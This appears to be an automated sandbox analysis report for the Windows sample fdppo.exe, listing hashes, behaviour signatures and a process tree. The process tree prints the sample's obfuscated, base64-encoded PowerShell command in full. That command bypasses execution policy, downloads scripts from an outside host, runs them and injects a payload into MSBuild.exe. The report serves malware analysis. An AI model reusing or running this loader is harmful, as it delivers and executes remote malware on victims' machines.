Analysis
-
max time kernel
143s -
max time network
144s -
platform
windows10_x64 -
resource
win10 -
submitted
13-07-2020 14:36
Static task
static1
Behavioral task
behavioral1
Sample
fdppo.exe
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
fdppo.exe
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
fdppo.exe
-
Size
101KB
-
MD5
082348ffb2977a0762e3e5d6f4a47ff4
-
SHA1
a63f12bba792fd01307373a7565b96549eb9f3c8
-
SHA256
8f9fcdd00e43b8845139ba38f9d4f164e526736578eab199e7f7af5d8179f01c
-
SHA512
ac00b157a3ae8af9502658c2fa72d80eb871f4ca9ee6b36393c526fbe0d35383855633bc871623c3088f3cdbd75a537b52ef24d8d1995353896637c3a27cf91c
Score
3/10
Malware Config
Signatures
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
fdppo.exeWerFault.exedescription pid process Token: SeDebugPrivilege 3844 fdppo.exe Token: SeRestorePrivilege 2840 WerFault.exe Token: SeBackupPrivilege 2840 WerFault.exe Token: SeDebugPrivilege 2840 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
fdppo.exeWerFault.exepid process 3844 fdppo.exe 3844 fdppo.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe 2840 WerFault.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
fdppo.exedescription pid process target process PID 3844 wrote to memory of 2968 3844 fdppo.exe powershell.exe PID 3844 wrote to memory of 2968 3844 fdppo.exe powershell.exe PID 3844 wrote to memory of 2968 3844 fdppo.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2840 2968 WerFault.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fdppo.exe"C:\Users\Admin\AppData\Local\Temp\fdppo.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3844 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwB6AC4AegB6AC4AaAB0AC8ATgBlADYANABvAC4AdAB4AHQAJwApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIAAiADQANAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAqACIALAAgACIANAA4ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACAAIgA3ADgAIgApAHwASQBFAFgAOwBbAEIAeQB0AGUAWwBdAF0AJABmAD0AWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEkAbgB0AGUAcgBhAGMAdABpAG8AbgBdADoAOgBDAGEAbABsAEIAeQBuAGEAbQBlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAHCBgAE4AYABlAGAAVABgAC4AYABXAGAAZQBgAEIAYABDAGAAbABgAGkAYABlAGAATgBgAFQAHSApACwAJAByAGUAZwAsAFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBDAGEAbABsAFQAeQBwAGUAXQA6ADoATQBlAHQAaABvAGQALAAnAGgAdAB0ACcAKwBbAEMAaABhAHIAXQA4ADAAKwAnAHMAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AegAuAHoAegAuAGgAdAAvAFMAeABUAHAASQAuAHQAeAB0ACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA2⤵PID:2968
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 6963⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Program crash
PID:2840